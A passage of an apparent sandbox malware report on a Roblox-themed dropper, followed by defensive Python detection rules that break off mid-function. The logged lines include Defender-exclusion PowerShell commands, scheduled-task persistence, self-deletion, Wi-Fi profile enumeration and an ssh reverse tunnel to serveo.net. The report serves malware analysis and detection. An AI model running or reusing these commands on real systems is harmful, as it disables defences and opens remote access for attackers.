                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: Amcache.hve.41.drBinary or memory string: VMware
                  Source: Amcache.hve.41.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.41.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.41.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.41.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.41.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2063310153.0000010DD583F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                  Source: Amcache.hve.41.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.41.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.41.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.41.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.41.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.41.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3543453931.00000167CFE24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                  Source: Amcache.hve.41.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.41.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.41.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.41.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000000.1791180656.000001F995EB2000.00000002.00000001.01000000.00000008.sdmp, vkefq4cv.oil.exe.0.dr, vkefq4cv.oil.exe.4.drBinary or memory string: qemu'H
                  Source: Amcache.hve.41.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.41.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.41.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.41.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.41.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.41.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.41.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.41.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.41.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.41.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.41.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.41.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: vkefq4cv.oil.exe, 0000002C.00000002.3000161085.000001EC7F363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
                  Source: Amcache.hve.41.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'Jump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'Jump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID SignalJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.netJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "add-mppreference -exclusionpath 'c:\users\user\desktop\jqohoupmjp.exe'; add-mppreference -exclusionprocess 'jqohoupmjp'; add-mppreference -exclusionpath 'c:\windows'; add-mppreference -exclusionpath 'c:\users\user'
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "vkefq4cv.oil" /sc minute /tr "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\vkefq4cv.oil.exe" &&start "" "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "add-mppreference -exclusionpath 'c:\users\user\desktop\jqohoupmjp.exe'; add-mppreference -exclusionprocess 'jqohoupmjp'; add-mppreference -exclusionpath 'c:\windows'; add-mppreference -exclusionpath 'c:\users\user'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "vkefq4cv.oil" /sc minute /tr "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\vkefq4cv.oil.exe" &&start "" "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exeJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Users\user\Desktop\jqOHOuPMJP.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: Amcache.hve.41.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.41.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.41.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.41.drBinary or memory string: MsMpEng.exe
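The process-creation and registry entries in the two sections above are the raw material for detection rules: Add-MpPreference exclusions covering C:\Windows and the whole user profile, a schtasks task that runs every minute at the highest run level from a binary under AppData while the Temp dropper deletes itself, netsh wlan profile enumeration, an ssh.exe -R tunnel through serveo.net with host key checking disabled, and a write to EnableLUA. The following is an added example and is not part of the Joe Sandbox report or of the sample: Python triage rules run over events transcribed (and lightly normalised) from the report's own lines. The event field names (image, command_line, key, value, data) are an assumed telemetry schema, and the EnableLUA data value of 0 is an assumption; the report records only that the value was created.

```python
"""Triage rules over the evasion, persistence and tunnelling events in this report.
Added example: events are transcribed (lightly normalised) from the report's
process-creation and registry lines; the field names are an assumed schema."""
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    detail: str

# Constructed sample events. The EnableLUA data (0) is assumed: the report only
# records that the value was created under Policies\System.
PROCESS_EVENTS = [
    {"image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'''powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'"'''},
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" && START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"'},
    {"image": r"C:\Windows\System32\netsh.exe", "command_line": "netsh wlan show profiles"},
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "command_line": '"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net'},
    {"image": r"C:\Windows\System32\chcp.com", "command_line": "chcp 65001"},  # benign noise
]
REGISTRY_EVENTS = [
    {"image": r"C:\Users\user\Desktop\jqOHOuPMJP.exe",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "value": "EnableLUA", "data": 0},
]

EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+'([^']+)'", re.I)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)

def parse_exclusions(command_line):
    """(kind, value) for every Defender exclusion added on one command line."""
    return EXCLUSION_RE.findall(command_line)

def rule_defender_exclusion(ev):
    hits = parse_exclusions(ev["command_line"])
    if not hits:
        return None
    # A path one or two levels below the drive root (C:\Windows, C:\Users\user)
    # blinds Defender to a whole tree, not just the dropped file.
    broad = [v for kind, v in hits if kind.lower() == "path" and v.rstrip("\\").count("\\") <= 2]
    return Finding("defender_exclusion", ev["image"], f"{len(hits)} exclusions; broad paths: {broad}")

def rule_schtasks_persistence(ev):
    cl = ev["command_line"]
    if not re.search(r"schtasks(\.exe)?\s+/create", cl, re.I):
        return None
    tr = re.search(r'/tr\s+(?:"([^"]+)"|(\S+))', cl, re.I)
    target = (tr.group(1) or tr.group(2)) if tr else ""
    sc = re.search(r"/sc\s+(\w+)", cl, re.I)
    rl = re.search(r"/rl\s+(\w+)", cl, re.I)
    flags = []
    if sc and sc.group(1).upper() == "MINUTE":
        flags.append("runs every minute")
    if rl and rl.group(1).upper() == "HIGHEST":
        flags.append("highest run level")
    if USER_WRITABLE_RE.search(target):
        flags.append("binary in user-writable directory")
    return Finding("schtasks_persistence", ev["image"], f"{target}: " + ", ".join(flags)) if flags else None

def rule_dropper_self_delete(ev):
    # DEL of a Temp payload chained after the task creation: the first stage removes itself.
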